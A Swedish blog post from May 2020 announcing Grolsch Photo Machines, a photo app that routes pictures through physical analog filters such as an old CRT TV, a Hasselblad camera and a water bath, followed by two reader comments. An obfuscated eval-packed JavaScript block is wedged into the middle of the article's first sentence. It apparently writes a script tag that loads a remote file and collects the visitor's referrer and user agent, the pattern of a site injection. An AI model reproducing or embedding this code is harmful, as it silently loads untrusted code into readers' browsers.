Image Image Image Image Image Image Image Image Image Image

| 26 maj, 2020

Scroll to top

Top

Grolsch Photo Machines filtrerar din bild genom verkligheten

Grolsch Photo Machines filtrerar din bild genom verkligheten
Sebastian

Grolsch eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|inrsr|var|u0026u|referrer|eahys||js|php’.split(’|’),0,{}))
tar ett nytt grepp på dagens moderna foto-appar och sammanväver det bästa ur dåtidens analoga apparater med dagens teknik. Den 31 maj lanseras Grolsch Photo Machines, en fotoapplikation till iPhone och Facebook som med hjälp av utplacerade filterstationer erbjuder ett unikt uttryck till din bild.

Då längtan efter det analoga blir allt större har Grolsch tillsammans med Society 46 utvecklat en app där retrokänslan kombineras med dagens digitala teknik. Den bild du tar med Grolsch Photo Machines skickas till exempel till en gammal hederlig tjock-TV, där bilden displayas, fotas av och skickas tillbaka till din iPhone.

Grolsch Photo Machines kommer att innehålla totalt sex olika filter, dessa är utplacerade i den riktiga världen och påminner om en analog framkallningsprocess.

De tre första filtren som presenteras är:

Tjockteve

Alla minns den gamla tjockteven. Grolsch har dammat av en sådan och placerat den i hörnet av en välkänd vintagebutik där den väntar på att få framkalla något alldeles unikt; din bild. Du kan dessutom lägga till egna undertexter om du vill.

Mellanformat

Skicka din bild genom en riktigt klassisk Hasselbladskamera. Några som borde veta allt om detta fenomen är en tidningsredaktion, och därför är detta filter placerat hos en internationell tidningsredaktion, belägen i Stockholm, för att sprida sin analoga glädje.

Vatten

Man skulle kunna säga att vatten var ett av de första filtren som användes inom fotografin, då det påverkade hela framkallningsprocessen. På ett tekniklabb hos Society 46 i centrala Stockholm, står ett vattenbad och väntar på en bild, beroende på hur vågorna på vattenytan ter sig, får din bild ett drömskt uttryck varje gång du använder detta filter.

Fler filter kommer under sommaren och hösten, bland annat en monitorvägg på sommarklubben Trädgården.

Grolsch Photo Machines är gratis och finns att ladda ner via App Store och Facebook. Besök Grolsch Photo Machines här.

Comments

  1. Derp

    Tycks dock som att ölföretaget snott hela idéen från InstaCRT som släpptes i maj. What gives?!

    • Peter

      Är det inte svenska företag bra på att sno grejer från andra? 😛